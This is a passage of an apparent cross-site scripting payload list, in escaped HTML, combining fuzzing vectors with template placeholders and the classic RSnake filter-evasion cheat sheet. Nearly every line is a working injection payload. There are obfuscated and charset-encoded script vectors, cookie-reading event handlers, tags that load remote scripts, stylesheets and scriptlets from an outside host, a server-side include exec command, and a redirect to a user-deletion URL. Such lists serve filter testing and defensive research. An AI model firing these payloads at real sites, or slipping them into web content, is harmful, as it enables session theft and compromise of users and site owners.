style=\\\&quot;-o-link:\\\&#039;javascript:javascript:alert(1)\\\&#039;;-o-link-source:current\\\&quot;&gt;X\\r\\n&lt;style&gt;p[foo=bar{}*{-o-link:\\\&#039;javascript:javascript:alert(1)\\\&#039;}{}*{-o-link-source:current}]{color:red};&lt;/style&gt;\\r\\n&lt;link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d\\r\\n&lt;style&gt;@import \\\&quot;data:,*%7bx:expression(javascript:alert(1))%7D\\\&quot;;&lt;/style&gt;\\r\\n&lt;a style=\\\&quot;pointer-events:none;position:absolute;\\\&quot;&gt;&lt;a style=\\\&quot;position:absolute;\\\&quot; onclick=\\\&quot;javascript:alert(1);\\\&quot;&gt;XXX&lt;/a&gt;&lt;/a&gt;&lt;a href=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;XXX&lt;/a&gt;\\r\\n&lt;style&gt;*[{}@import\\\&#039;%(css)s?]&lt;/style&gt;X\\r\\n&lt;div style=\\\&quot;font-family:\\\&#039;foo&amp;#10;;color:red;\\\&#039;;\\\&quot;&gt;XXX\\r\\n&lt;div style=\\\&quot;font-family:foo}color=red;\\\&quot;&gt;XXX\\r\\n&lt;// style=x:expression\\\\28javascript:alert(1)\\\\29&gt;\\r\\n&lt;style&gt;*{x:expression(javascript:alert(1))}&lt;/style&gt;\\r\\n&lt;div style=content:url(%(svg)s)&gt;&lt;/div&gt;\\r\\n&lt;div style=\\\&quot;list-style:url(http://foo.f)\\\\20url(javascript:javascript:alert(1));\\\&quot;&gt;X\\r\\n&lt;div id=d&gt;&lt;div style=\\\&quot;font-family:\\\&#039;sans\\\\27\\\\3B color\\\\3Ared\\\\3B\\\&#039;\\\&quot;&gt;X&lt;/div&gt;&lt;/div&gt; &lt;script&gt;with(document.getElementById(\\\&quot;d\\\&quot;))innerHTML=innerHTML&lt;/script&gt;\\r\\n&lt;div style=\\\&quot;background:url(/f#&amp;#127;oo/;color:red/*/foo.jpg);\\\&quot;&gt;X\\r\\n&lt;div style=\\\&quot;font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\\\&quot;&gt;X\\r\\n&lt;div id=\\\&quot;x\\\&quot;&gt;XXX&lt;/div&gt; &lt;style&gt; #x{font-family:foo[bar;color:green;} #y];color:red;{} &lt;/style&gt;\\r\\n&lt;x style=\\\&quot;background:url(\\\&#039;x&amp;#1;;color:red;/*\\\&#039;)\\\&quot;&gt;XXX&lt;/x&gt;\\r\\n&lt;script&gt;({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval&lt;/script&gt;\\r\\n&lt;script&gt;({0:#0=eval/#0#/#0#(javascript:alert(1))})&lt;/script&gt;\\r\\n&lt;script&gt;ReferenceError.prototype.__defineGetter__(\\\&#039;name\\\&#039;, function(){javascript:alert(1)}),x&lt;/script&gt;\\r\\n&lt;script&gt;Object.__noSuchMethod__ = Function,[{}][0].constructor._(\\\&#039;javascript:alert(1)\\\&#039;)()&lt;/script&gt;\\r\\n&lt;meta charset=\\\&quot;x-imap4-modified-utf7\\\&quot;&gt;&amp;ADz&amp;AGn&amp;AG0&amp;AEf&amp;ACA&amp;AHM&amp;AHI&amp;AGO&amp;AD0&amp;AGn&amp;ACA&amp;AG8Abg&amp;AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&amp;ACAAPABi\\r\\n&lt;meta charset=\\\&quot;x-imap4-modified-utf7\\\&quot;&gt;&amp;&lt;script&amp;S1&amp;TS&amp;1&gt;alert&amp;A7&amp;(1)&amp;R&amp;UA;&amp;&amp;&lt;&amp;A9&amp;11/script&amp;X&amp;&gt;\\r\\n&lt;meta charset=\\\&quot;mac-farsi\\\&quot;&gt;¼script¾javascript:alert(1)¼/script¾\\r\\nX&lt;x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` &gt;\\r\\n1&lt;set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&amp;#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&amp;lt;img/src=&amp;quot;x&amp;quot;onerror=javascript:alert(1)&amp;gt;`&gt;\\r\\n1&lt;animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&amp;lt;img/src=&amp;quot;.&amp;quot;onerror=javascript:alert(1)&amp;gt;&gt;\\r\\n&lt;vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss&gt;&lt;/vmlframe&gt;\\r\\n1&lt;a href=#&gt;&lt;line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /&gt;&lt;/a&gt;\\r\\n&lt;a style=\\\&quot;behavior:url(#default#AnchorClick);\\\&quot; folder=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;XXX&lt;/a&gt;\\r\\n&lt;x style=\\\&quot;behavior:url(%(sct)s)\\\&quot;&gt;\\r\\n&lt;xml id=\\\&quot;xss\\\&quot; src=\\\&quot;%(htc)s\\\&quot;&gt;&lt;/xml&gt; &lt;label dataformatas=\\\&quot;html\\\&quot; datasrc=\\\&quot;#xss\\\&quot; datafld=\\\&quot;payload\\\&quot;&gt;&lt;/label&gt;\\r\\n&lt;event-source src=\\\&quot;%(event)s\\\&quot; onload=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;a href=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;event-source src=\\\&quot;data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\\\&quot;&gt;\\r\\n&lt;div id=\\\&quot;x\\\&quot;&gt;x&lt;/div&gt; &lt;xml:namespace prefix=\\\&quot;t\\\&quot;&gt; &lt;import namespace=\\\&quot;t\\\&quot; implementation=\\\&quot;#default#time2\\\&quot;&gt; &lt;t:set attributeName=\\\&quot;innerHTML\\\&quot; targetElement=\\\&quot;x\\\&quot; to=\\\&quot;&amp;lt;img&amp;#11;src=x:x&amp;#11;onerror&amp;#11;=javascript:alert(1)&amp;gt;\\\&quot;&gt;\\r\\n&lt;script&gt;%(payload)s&lt;/script&gt;\\r\\n&lt;script src=%(jscript)s&gt;&lt;/script&gt;\\r\\n&lt;script language=\\\&#039;javascript\\\&#039; src=\\\&#039;%(jscript)s\\\&#039;&gt;&lt;/script&gt;\\r\\n&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:javascript:alert(1);\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:javascript:alert(1)&gt;\\r\\n&lt;IMG SRC=`javascript:javascript:alert(1)`&gt;\\r\\n&lt;SCRIPT SRC=%(jscript)s?&lt;B&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\&quot;javascript:javascript:alert(1);\\\&quot;&gt;&lt;/FRAMESET&gt;\\r\\n&lt;BODY ONLOAD=javascript:alert(1)&gt;\\r\\n&lt;BODY ONLOAD=javascript:javascript:alert(1)&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav ascript:javascript:alert(1);\\\&quot;&gt;\\r\\n&lt;BODY onload!#$%%&amp;()*~+-_.,:;?@[/|\\\\]^`=javascript:alert(1)&gt;\\r\\n&lt;SCRIPT/SRC=\\\&quot;%(jscript)s\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;&lt;SCRIPT&gt;%(payload)s//&lt;&lt;/SCRIPT&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:javascript:alert(1)\\\&quot;\\r\\n&lt;iframe src=%(scriptlet)s &lt;\\r\\n&lt;INPUT TYPE=\\\&quot;IMAGE\\\&quot; SRC=\\\&quot;javascript:javascript:alert(1);\\\&quot;&gt;\\r\\n&lt;IMG DYNSRC=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;IMG LOWSRC=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;BGSOUND SRC=\\\&quot;javascript:javascript:alert(1);\\\&quot;&gt;\\r\\n&lt;BR SIZE=\\\&quot;&amp;{javascript:alert(1)}\\\&quot;&gt;\\r\\n&lt;LAYER SRC=\\\&quot;%(scriptlet)s\\\&quot;&gt;&lt;/LAYER&gt;\\r\\n&lt;LINK REL=\\\&quot;stylesheet\\\&quot; HREF=\\\&quot;javascript:javascript:alert(1);\\\&quot;&gt;\\r\\n&lt;STYLE&gt;@import\\\&#039;%(css)s\\\&#039;;&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;Link\\\&quot; Content=\\\&quot;&lt;%(css)s&gt;; REL=stylesheet\\\&quot;&gt;\\r\\n&lt;XSS STYLE=\\\&quot;behavior: url(%(htc)s);\\\&quot;&gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\&quot;javascript:javascript:alert(1)\\\&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0;url=javascript:javascript:alert(1);\\\&quot;&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0; URL=http://;URL=javascript:javascript:alert(1);\\\&quot;&gt;\\r\\n&lt;IFRAME SRC=\\\&quot;javascript:javascript:alert(1);\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;TABLE BACKGROUND=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image: url(javascript:javascript:alert(1))\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;width:expression(javascript:alert(1));\\\&quot;&gt;\\r\\n&lt;IMG STYLE=\\\&quot;xss:expr/*XSS*/ession(javascript:alert(1))\\\&quot;&gt;\\r\\n&lt;XSS STYLE=\\\&quot;xss:expression(javascript:alert(1))\\\&quot;&gt;\\r\\n&lt;STYLE TYPE=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(\\\&quot;javascript:javascript:alert(1)\\\&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\\r\\n&lt;STYLE type=\\\&quot;text/css\\\&quot;&gt;BODY{background:url(\\\&quot;javascript:javascript:alert(1)\\\&quot;)}&lt;/STYLE&gt;\\r\\n&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;javascript:alert(1);&lt;/SCRIPT&gt;&lt;![endif]--&gt;\\r\\n&lt;BASE HREF=\\\&quot;javascript:javascript:alert(1);//\\\&quot;&gt;\\r\\n&lt;OBJECT TYPE=\\\&quot;text/x-scriptlet\\\&quot; DATA=\\\&quot;%(scriptlet)s\\\&quot;&gt;&lt;/OBJECT&gt;\\r\\n&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:javascript:alert(1)&gt;&lt;/OBJECT&gt;\\r\\n&lt;HTML xmlns:xss&gt;&lt;?import namespace=\\\&quot;xss\\\&quot; implementation=\\\&quot;%(htc)s\\\&quot;&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;\\\&quot;\\\&quot;\\\&quot;,\\\&quot;XML namespace.\\\&quot;),(\\\&quot;\\\&quot;\\\&quot;&lt;XML ID=\\\&quot;xss\\\&quot;&gt;&lt;I&gt;&lt;B&gt;&amp;lt;IMG SRC=\\\&quot;javas&lt;!-- --&gt;cript:javascript:alert(1)\\\&quot;&amp;gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=\\\&quot;#xss\\\&quot; DATAFLD=\\\&quot;B\\\&quot; DATAFORMATAS=\\\&quot;HTML\\\&quot;&gt;&lt;/SPAN&gt;\\r\\n&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=\\\&quot;t\\\&quot; ns=\\\&quot;urn:schemas-microsoft-com:time\\\&quot;&gt;&lt;?import namespace=\\\&quot;t\\\&quot; implementation=\\\&quot;#default#time2\\\&quot;&gt;&lt;t:set attributeName=\\\&quot;innerHTML\\\&quot; to=\\\&quot;XSS&amp;lt;SCRIPT DEFER&amp;gt;javascript:alert(1)&amp;lt;/SCRIPT&amp;gt;\\\&quot;&gt;&lt;/BODY&gt;&lt;/HTML&gt;\\r\\n&lt;SCRIPT SRC=\\\&quot;%(jpg)s\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;HEAD&gt;&lt;META HTTP-EQUIV=\\\&quot;CONTENT-TYPE\\\&quot; CONTENT=\\\&quot;text/html; charset=UTF-7\\\&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-\\r\\n&lt;form id=\\\&quot;test\\\&quot; /&gt;&lt;button form=\\\&quot;test\\\&quot; formaction=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;X\\r\\n&lt;body onscroll=javascript:alert(1)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;\\r\\n&lt;P STYLE=\\\&quot;behavior:url(\\\&#039;#default#time2\\\&#039;)\\\&quot; end=\\\&quot;0\\\&quot; onEnd=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;STYLE&gt;@import\\\&#039;%(css)s\\\&#039;;&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;a{background:url(\\\&#039;s1\\\&#039; \\\&#039;s2)}@import javascript:javascript:alert(1);\\\&#039;);}&lt;/STYLE&gt;\\r\\n&lt;meta charset= \\\&quot;x-imap4-modified-utf7\\\&quot;&amp;&amp;&gt;&amp;&amp;&lt;script&amp;&amp;&gt;javascript:alert(1)&amp;&amp;;&amp;&amp;&lt;&amp;&amp;/script&amp;&amp;&gt;\\r\\n&lt;SCRIPT onreadystatechange=javascript:javascript:alert(1);&gt;&lt;/SCRIPT&gt;\\r\\n&lt;style onreadystatechange=javascript:javascript:alert(1);&gt;&lt;/style&gt;\\r\\n&lt;?xml version=\\\&quot;1.0\\\&quot;?&gt;&lt;html:html xmlns:html=\\\&#039;http://www.w3.org/1999/xhtml\\\&#039;&gt;&lt;html:script&gt;javascript:alert(1);&lt;/html:script&gt;&lt;/html:html&gt;\\r\\n&lt;embed code=%(scriptlet)s&gt;&lt;/embed&gt;\\r\\n&lt;embed code=javascript:javascript:alert(1);&gt;&lt;/embed&gt;\\r\\n&lt;embed src=%(jscript)s&gt;&lt;/embed&gt;\\r\\n&lt;frameset onload=javascript:javascript:alert(1)&gt;&lt;/frameset&gt;\\r\\n&lt;object onerror=javascript:javascript:alert(1)&gt;\\r\\n&lt;embed type=\\\&quot;image\\\&quot; src=%(scriptlet)s&gt;&lt;/embed&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=\\\&quot;javas]]&lt;![CDATA[cript:javascript:alert(1);\\\&quot;&gt;]]&lt;/C&gt;&lt;X&gt;&lt;/xml&gt;\\r\\n&lt;IMG SRC=&amp;{javascript:alert(1);};&gt;\\r\\n&lt;a href=\\\&quot;jav&amp;#65ascript:javascript:alert(1)\\\&quot;&gt;test1&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;jav&amp;#97ascript:javascript:alert(1)\\\&quot;&gt;test1&lt;/a&gt;\\r\\n&lt;embed width=500 height=500 code=\\\&quot;data:text/html,&lt;script&gt;%(payload)s&lt;/script&gt;\\\&quot;&gt;&lt;/embed&gt;\\r\\n&lt;iframe srcdoc=\\\&quot;&amp;LT;iframe&amp;sol;srcdoc=&amp;amp;lt;img&amp;sol;src=&amp;amp;apos;&amp;amp;apos;onerror=javascript:alert(1)&amp;amp;gt;&gt;\\\&quot;&gt;\\r\\n\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&quot;;\\r\\nalert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//--\\r\\n&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n\\\&#039;\\\&#039;;!--\\\&quot;&lt;XSS&gt;=&amp;{()}\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=JaVaScRiPt:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=javascript:alert(\\\&quot;XSS\\\&quot;)&gt;\\r\\n&lt;IMG SRC=`javascript:alert(\\\&quot;RSnake says, \\\&#039;XSS\\\&#039;\\\&quot;)`&gt;\\r\\n&lt;a onmouseover=\\\&quot;alert(document.cookie)\\\&quot;&gt;xxs link&lt;/a&gt;\\r\\n&lt;a onmouseover=alert(document.cookie)&gt;xxs link&lt;/a&gt;\\r\\n&lt;IMG \\\&quot;\\\&quot;\\\&quot;&gt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;)&lt;/SCRIPT&gt;\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;\\r\\n&lt;IMG SRC=# onmouseover=\\\&quot;alert(\\\&#039;xxs\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG SRC= onmouseover=\\\&quot;alert(\\\&#039;xxs\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG onmouseover=\\\&quot;alert(\\\&#039;xxs\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;\\r\\n&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;\\r\\n&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav ascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x09;ascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x0A;ascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x0D;ascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\nperl -e \\\&#039;print \\\&quot;&lt;IMG SRC=java\\\\0script:alert(\\\\\\\&quot;XSS\\\\\\\&quot;)&gt;\\\&quot;;\\\&#039; &gt; out\\r\\n&lt;IMG SRC=\\\&quot; &amp;#14; javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;SCRIPT/XSS SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\\\\]^`=alert(\\\&quot;XSS\\\&quot;)&gt;\\r\\n&lt;SCRIPT/SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;);//&lt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt; B &gt;\\r\\n&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;\\r\\n&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;\\r\\n\\\\\\\&quot;;alert(\\\&#039;XSS\\\&#039;);//\\r\\n&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;);&lt;/SCRIPT&gt;\\r\\n&lt;INPUT TYPE=\\\&quot;IMAGE\\\&quot; SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;BODY BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG DYNSRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG LOWSRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;\\r\\n&lt;IMG SRC=\\\&#039;vbscript:msgbox(\\\&quot;XSS\\\&quot;)\\\&#039;&gt;\\r\\n&lt;IMG SRC=\\\&quot;livescript:[code]\\\&quot;&gt;\\r\\n&lt;BODY ONLOAD=alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;BGSOUND SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;BR SIZE=\\\&quot;&amp;{alert(\\\&#039;XSS\\\&#039;)}\\\&quot;&gt;\\r\\n&lt;LINK REL=\\\&quot;stylesheet\\\&quot; HREF=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;LINK REL=\\\&quot;stylesheet\\\&quot; HREF=\\\&quot;http://ha.ckers.org/xss.css\\\&quot;&gt;\\r\\n&lt;STYLE&gt;@import\\\&#039;http://ha.ckers.org/xss.css\\\&#039;;&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;Link\\\&quot; Content=\\\&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet\\\&quot;&gt;\\r\\n&lt;STYLE&gt;BODY{-moz-binding:url(\\\&quot;http://ha.ckers.org/xssmoz.xml#xss\\\&quot;)}&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\&#039;\\\\ja\\\\vasc\\\\ript:alert(\\\&quot;XSS\\\&quot;)\\\&#039;;&lt;/STYLE&gt;\\r\\n&lt;IMG STYLE=\\\&quot;xss:expr/*XSS*/ession(alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\nexp/*&lt;A STYLE=\\\&#039;no\\\\xss:noxss(\\\&quot;*//*\\\&quot;);xss:ex/*XSS*//*/*/pression(alert(\\\&quot;XSS\\\&quot;))\\\&#039;&gt;\\r\\n&lt;STYLE TYPE=\\\&quot;text/javascript\\\&quot;&gt;alert(\\\&#039;XSS\\\&#039;);&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\\r\\n&lt;STYLE type=\\\&quot;text/css\\\&quot;&gt;BODY{background:url(\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;)}&lt;/STYLE&gt;\\r\\n&lt;STYLE type=\\\&quot;text/css\\\&quot;&gt;BODY{background:url(\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;)}&lt;/STYLE&gt;\\r\\n&lt;XSS STYLE=\\\&quot;xss:expression(alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;XSS STYLE=\\\&quot;behavior: url(xss.htc);\\\&quot;&gt;\\r\\n¼script¾alert(¢XSS¢)¼/script¾\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0;url=javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\&quot;&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0; URL=http://;URL=javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IFRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;IFRAME SRC=# onmouseover=\\\&quot;alert(document.cookie)\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/FRAMESET&gt;\\r\\n&lt;TABLE BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image: url(javascript:alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\&#039;\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029\\\&#039;\\\\0029\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image: url(&amp;#1;javascript:alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;width: expression(alert(\\\&#039;XSS\\\&#039;));\\\&quot;&gt;\\r\\n&lt;BASE HREF=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);//\\\&quot;&gt;\\r\\n &lt;OBJECT TYPE=\\\&quot;text/x-scriptlet\\\&quot; DATA=\\\&quot;http://ha.ckers.org/scriptlet.html\\\&quot;&gt;&lt;/OBJECT&gt;\\r\\n&lt;EMBED SRC=\\\&quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\&quot; type=\\\&quot;image/svg+xml\\\&quot; AllowScriptAccess=\\\&quot;always\\\&quot;&gt;&lt;/EMBED&gt;\\r\\n&lt;SCRIPT SRC=\\\&quot;http://ha.ckers.org/xss.jpg\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;!--#exec cmd=\\\&quot;/bin/echo \\\&#039;&lt;SCR\\\&#039;\\\&quot;--&gt;&lt;!--#exec cmd=\\\&quot;/bin/echo \\\&#039;IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;\\\&#039;\\\&quot;--&gt;\\r\\n&lt;? echo(\\\&#039;&lt;SCR)\\\&#039;;echo(\\\&#039;IPT&gt;alert(\\\&quot;XSS\\\&quot;)&lt;/SCRIPT&gt;\\\&#039;); ?&gt;\\r\\n&lt;IMG SRC=\\\&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\&quot;&gt;\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser\\r\\n&lt;META 